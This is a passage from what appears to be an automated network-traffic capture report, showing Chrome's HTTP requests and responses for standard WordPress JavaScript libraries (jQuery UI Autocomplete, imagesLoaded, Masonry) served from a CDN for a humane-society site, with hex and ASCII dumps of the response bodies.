                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC481INData Raw: a0 ac de 9d c2 97 b4 51 c9 48 c9 28 25 01 16 00 00 00 00 08 b1 85 09 b2 b7 25 fc 7a 9f 08 b0 00 00 00 00 4e c1 49 4c 27 7e 6a 59 6d 0c 25 5d 97 e0 ab 6c 24 f5 6a ab f9 90 a2 0c 00 00 00 80 10 5b ee 20 db 55 b1 f7 92 65 0f 58 00 00 00 00 27 e7 dd a9 7e 71 1b bd fc af 85 c1 a2 99 49 aa 10 60 01 00 00 00 10 62 4f 2b c8 8e 94 bc 27 fb 50 a0 c3 be 15 5b e8 00 00 00 00 38 51 27 3b 9d 78 5b 81 b6 e0 b9 a9 ad e6 7d 8a 2d 00 00 00 00 42 2c 42 5e f0 69 23 a9 6b 23 c7 00 00 00 00 70 b2 de 71 0a fe 61 db d4 7c 09 ec b0 66 92 9a 04 58 00 00 00 00 20 c4 3e 17 64 07 92 3e 28 8c 05 9f d2 f7 5f d7 5c 19 00 00 00 00 60 3a f1 8b 96 d5 46 45 d2 48 f9 bd 27 fb 89 fd 5f 01 00 00 00 e0 df 18 89 7d 81 8d 7e 46 4a 46 43 b3 f4 20 e9 77 02 2c 00 00 00 00 fc 8a 91 d8 1d 2c ab 8d 9e
                                                                                                                                                                                                                                                        Data Ascii: QH(%%zNIL'~jYm%]l$j[ UeX'~qI`bO+'P[8Q';x[}-B,B^i#k#pqa|fX >d>(_\`:FEH'_}~FJFC w,,


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        32192.168.2.449783192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC408OUTGET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC634INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 8536
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/ui/autocomplete.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC735INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69
                                                                                                                                                                                                                                                        Data Ascii: /*! * jQuery UI Autocomplete 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?defi
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 2c 73 2c 6e 2c 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 74 3d 22 74 65 78 74 61 72 65 61 22 3d 3d 3d 65 2c 65 3d 22 69 6e 70 75 74 22 3d 3d 3d 65 3b 74 68 69 73 2e 69 73 4d 75 6c 74 69 4c 69 6e 65 3d 74 7c 7c 21 65 26 26 74 68 69 73 2e 5f 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 76 61 6c 75 65 4d 65 74 68 6f 64 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 74 7c 7c 65 3f 22 76 61 6c 22 3a 22 74 65 78 74 22 5d 2c 74 68 69 73 2e 69 73 4e 65 77 4d 65 6e 75 3d 21 30 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 22 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65
                                                                                                                                                                                                                                                        Data Ascii: e:function(){var i,s,n,e=this.element[0].nodeName.toLowerCase(),t="textarea"===e,e="input"===e;this.isMultiLine=t||!e&&this._isContentEditable(this.element),this.valueMethod=this.element[t||e?"val":"text"],this.isNewMenu=!0,this._addClass("ui-autocomplete
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 6c 65 63 74 65 64 49 74 65 6d 3d 6e 75 6c 6c 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 3d 74 68 69 73 2e 5f 76 61 6c 75 65 28 29 7d 2c 62 6c 75 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 73 65 61 72 63 68 69 6e 67 29 2c 74 68 69 73 2e 63 6c 6f 73 65 28 65 29 2c 74 68 69 73 2e 5f 63 68 61 6e 67 65 28 65 29 7d 7d 29 2c 74 68 69 73 2e 5f 69 6e 69 74 53 6f 75 72 63 65 28 29 2c 74 68 69 73 2e 6d 65 6e 75 3d 6f 28 22 3c 75 6c 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 74 68 69 73 2e 5f 61 70 70 65 6e 64 54 6f 28 29 29 2e 6d 65 6e 75 28 7b 72 6f 6c 65 3a 6e 75 6c 6c 7d 29 2e 68 69 64 65 28 29 2e 61 74 74 72 28 7b 75 6e 73 65 6c 65 63 74 61 62 6c 65 3a 22 6f 6e 22 7d 29 2e 6d
                                                                                                                                                                                                                                                        Data Ascii: ion(){this.selectedItem=null,this.previous=this._value()},blur:function(e){clearTimeout(this.searching),this.close(e),this._change(e)}}),this._initSource(),this.menu=o("<ul>").appendTo(this._appendTo()).menu({role:null}).hide().attr({unselectable:"on"}).m
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 65 67 69 6f 6e 3d 6f 28 22 3c 64 69 76 3e 22 2c 7b 72 6f 6c 65 3a 22 73 74 61 74 75 73 22 2c 22 61 72 69 61 2d 6c 69 76 65 22 3a 22 61 73 73 65 72 74 69 76 65 22 2c 22 61 72 69 61 2d 72 65 6c 65 76 61 6e 74 22 3a 22 61 64 64 69 74 69 6f 6e 73 22 7d 29 2e 61 70 70 65 6e 64 54 6f 28 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 5b 30 5d 2e 62 6f 64 79 29 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 74 68 69 73 2e 6c 69 76 65 52 65 67 69 6f 6e 2c 6e 75 6c 6c 2c 22 75 69 2d 68 65 6c 70 65 72 2d 68 69 64 64 65 6e 2d 61 63 63 65 73 73 69 62 6c 65 22 29 2c 74 68 69 73 2e 5f 6f 6e 28 74 68 69 73 2e 77 69 6e 64 6f 77 2c 7b 62 65 66 6f 72 65 75 6e 6c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 28 22
                                                                                                                                                                                                                                                        Data Ascii: egion=o("<div>",{role:"status","aria-live":"assertive","aria-relevant":"additions"}).appendTo(this.document[0].body),this._addClass(this.liveRegion,null,"ui-helper-hidden-accessible"),this._on(this.window,{beforeunload:function(){this.element.removeAttr("
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 69 6f 6e 28 29 7b 74 28 5b 5d 29 7d 7d 29 7d 29 3a 74 68 69 73 2e 73 6f 75 72 63 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 6f 75 72 63 65 7d 2c 5f 73 65 61 72 63 68 54 69 6d 65 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 73 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 73 65 61 72 63 68 69 6e 67 29 2c 74 68 69 73 2e 73 65 61 72 63 68 69 6e 67 3d 74 68 69 73 2e 5f 64 65 6c 61 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 74 65 72 6d 3d 3d 3d 74 68 69 73 2e 5f 76 61 6c 75 65 28 29 2c 74 3d 74 68 69 73 2e 6d 65 6e 75 2e 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 2c 69 3d 73 2e 61 6c 74 4b 65 79 7c 7c 73 2e 63 74 72 6c 4b 65 79 7c 7c 73 2e 6d 65 74 61 4b 65 79 7c 7c 73 2e 73 68 69 66 74 4b 65 79
                                                                                                                                                                                                                                                        Data Ascii: ion(){t([])}})}):this.source=this.options.source},_searchTimeout:function(s){clearTimeout(this.searching),this.searching=this._delay(function(){var e=this.term===this._value(),t=this.menu.element.is(":visible"),i=s.altKey||s.ctrlKey||s.metaKey||s.shiftKey
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 65 6c 65 63 74 65 64 49 74 65 6d 7d 29 7d 2c 5f 6e 6f 72 6d 61 6c 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 26 26 65 5b 30 5d 2e 6c 61 62 65 6c 26 26 65 5b 30 5d 2e 76 61 6c 75 65 3f 65 3a 6f 2e 6d 61 70 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 7b 6c 61 62 65 6c 3a 65 2c 76 61 6c 75 65 3a 65 7d 3a 6f 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2c 7b 6c 61 62 65 6c 3a 65 2e 6c 61 62 65 6c 7c 7c 65 2e 76 61 6c 75 65 2c 76 61 6c 75 65 3a 65 2e 76 61 6c 75 65 7c 7c 65 2e 6c 61 62 65 6c 7d 29 7d 29 7d 2c 5f 73 75 67 67 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6d 65 6e 75 2e 65 6c 65 6d 65 6e 74 2e 65
                                                                                                                                                                                                                                                        Data Ascii: electedItem})},_normalize:function(e){return e.length&&e[0].label&&e[0].value?e:o.map(e,function(e){return"string"==typeof e?{label:e,value:e}:o.extend({},e,{label:e.label||e.value,value:e.value||e.label})})},_suggest:function(e){var t=this.menu.element.e
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC956INData Raw: 29 7d 2c 5f 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 21 21 65 2e 6c 65 6e 67 74 68 26 26 28 22 69 6e 68 65 72 69 74 22 3d 3d 3d 28 74 3d 65 2e 70 72 6f 70 28 22 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 22 29 29 3f 74 68 69 73 2e 5f 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 28 65 2e 70 61 72 65 6e 74 28 29 29 3a 22 74 72 75 65 22 3d 3d 3d 74 29 7d 7d 29 2c 6f 2e 65 78 74 65 6e 64 28 6f 2e 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2c 7b 65 73 63 61 70 65 52 65 67 65 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 2d 5c 5b 5c 5d 7b 7d 28 29 2a 2b 3f 2e 2c 5c 5c 5c 5e 24 7c 23 5c 73 5d 2f 67 2c 22 5c 5c 24
                                                                                                                                                                                                                                                        Data Ascii: )},_isContentEditable:function(e){var t;return!!e.length&&("inherit"===(t=e.prop("contentEditable"))?this._isContentEditable(e.parent()):"true"===t)}}),o.extend(o.ui.autocomplete,{escapeRegex:function(e){return e.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g,"\\$


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        33192.168.2.449785192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC397OUTGET /wp-includes/js/imagesloaded.min.js?ver=5.0.0 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 5520
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/imagesloaded.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 11 Aug 2023 18:18:26 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC745INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 35 2e 30 2e 30 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 74 2e 45 76 45 6d 69 74 74 65 72 3d 65 28 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated *//*! * imagesLoaded PACKAGED v5.0.0 * JavaScript is all like "You images are done yet or what?" * MIT License */!function(t,e){"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6c 65 74 20 69 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 26 26 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 74 5d 3b 69 66 28 21 69 7c 7c 21 69 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 3d 69 2e 73 6c 69 63 65 28 30 29 2c 65 3d 65 7c 7c 5b 5d 3b 6c 65 74 20 73 3d 74 68 69 73 2e 5f 6f 6e 63 65 45 76 65 6e 74 73 26 26 74 68 69 73 2e 5f 6f 6e 63 65 45 76 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 69 29 7b 73 26 26 73 5b 6e 5d 26 26 28 74 68 69 73 2e 6f 66 66 28 74 2c 6e 29 2c 64 65 6c 65 74 65 20 73 5b 6e 5d 29 2c 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 65 2e 61 6c 6c 4f 66 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64
                                                                                                                                                                                                                                                        Data Ascii: =function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;i=i.slice(0),e=e||[];let s=this._onceEvents&&this._onceEvents[t];for(let n of i){s&&s[n]&&(this.off(t,n),delete s[n]),n.apply(this,e)}return this},e.allOff=function(){return d
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 67 72 6f 75 6e 64 49 6d 61 67 65 73 28 74 29 3b 6c 65 74 7b 6e 6f 64 65 54 79 70 65 3a 65 7d 3d 74 3b 69 66 28 21 65 7c 7c 21 6f 2e 69 6e 63 6c 75 64 65 73 28 65 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 69 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6d 67 22 29 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 69 29 74 68 69 73 2e 61 64 64 49 6d 61 67 65 28 74 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 61 63 6b 67 72 6f 75 6e 64 29 7b 6c 65 74 20 65 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 61 63 6b 67 72 6f 75 6e 64 29 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 65 29 74 68 69 73 2e 61 64 64 45 6c 65 6d 65 6e 74 42 61 63
                                                                                                                                                                                                                                                        Data Ascii: groundImages(t);let{nodeType:e}=t;if(!e||!o.includes(e))return;let i=t.querySelectorAll("img");for(let t of i)this.addImage(t);if("string"==typeof this.options.background){let e=t.querySelectorAll(this.options.background);for(let t of e)this.addElementBac
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6c 65 74 20 74 3d 74 68 69 73 2e 68 61 73 41 6e 79 42 72 6f 6b 65 6e 3f 22 66 61 69 6c 22 3a 22 64 6f 6e 65 22 3b 69 66 28 74 68 69 73 2e 69 73 43 6f 6d 70 6c 65 74 65 3d 21 30 2c 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 74 2c 5b 74 68 69 73 5d 29 2c 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 22 61 6c 77 61 79 73 22 2c 5b 74 68 69 73 5d 29 2c 74 68 69 73 2e 6a 71 44 65 66 65 72 72 65 64 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 68 61 73 41 6e 79 42 72 6f 6b 65 6e 3f 22 72 65 6a 65 63 74 22 3a 22 72 65 73 6f 6c 76 65 22 3b 74 68 69 73 2e 6a 71 44 65 66 65 72 72 65 64 5b 74 5d 28 74 68 69 73 29 7d 7d 2c 68 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 2e 70 72 6f 74 6f 74 79 70 65 29 2c 68 2e 70 72 6f 74 6f 74 79 70 65 2e
                                                                                                                                                                                                                                                        Data Ascii: let t=this.hasAnyBroken?"fail":"done";if(this.isComplete=!0,this.emitEvent(t,[this]),this.emitEvent("always",[this]),this.jqDeferred){let t=this.hasAnyBroken?"reject":"resolve";this.jqDeferred[t](this)}},h.prototype=Object.create(e.prototype),h.prototype.
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC668INData Raw: 74 68 69 73 29 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 6d 67 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 6d 67 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 6d 67 2e 73 72 63 3d 74 68 69 73 2e 75 72 6c 2c 74 68 69 73 2e 67 65 74 49 73 49 6d 61 67 65 43 6f 6d 70 6c 65 74 65 28 29 26 26 28 74 68 69 73 2e 63 6f 6e 66 69 72 6d 28 30 21 3d 3d 74 68 69 73 2e 69 6d 67 2e 6e 61 74 75 72 61 6c 57 69 64 74 68 2c 22 6e 61 74 75 72 61 6c 57 69 64 74
                                                                                                                                                                                                                                                        Data Ascii: this)},d.prototype=Object.create(h.prototype),d.prototype.check=function(){this.img.addEventListener("load",this),this.img.addEventListener("error",this),this.img.src=this.url,this.getIsImageComplete()&&(this.confirm(0!==this.img.naturalWidth,"naturalWidt


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        34192.168.2.449786192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC407OUTGET /wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC633INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 1819
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/jquery.masonry.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 18 Aug 2016 18:55:30 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC736INData Raw: 2f 2a 21 0a 20 2a 20 4d 61 73 6f 6e 72 79 20 76 32 20 73 68 69 6d 0a 20 2a 20 74 6f 20 6d 61 69 6e 74 61 69 6e 20 62 61 63 6b 77 61 72 64 73 20 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 0a 20 2a 20 61 73 20 6f 66 20 4d 61 73 6f 6e 72 79 20 76 33 2e 31 2e 32 0a 20 2a 0a 20 2a 20 43 61 73 63 61 64 69 6e 67 20 67 72 69 64 20 6c 61 79 6f 75 74 20 6c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 3a 2f 2f 6d 61 73 6f 6e 72 79 2e 64 65 73 61 6e 64 72 6f 2e 63 6f 6d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 20 62 79 20 44 61 76 69 64 20 44 65 53 61 6e 64 72 6f 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 4d 61 73 6f 6e 72 79 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 72 65 6d 61 70 56 32
                                                                                                                                                                                                                                                        Data Ascii: /*! * Masonry v2 shim * to maintain backwards compatibility * as of Masonry v3.1.2 * * Cascading grid layout library * http://masonry.desandro.com * MIT License * by David DeSandro */!function(a){"use strict";var b=a.Masonry;b.prototype._remapV2
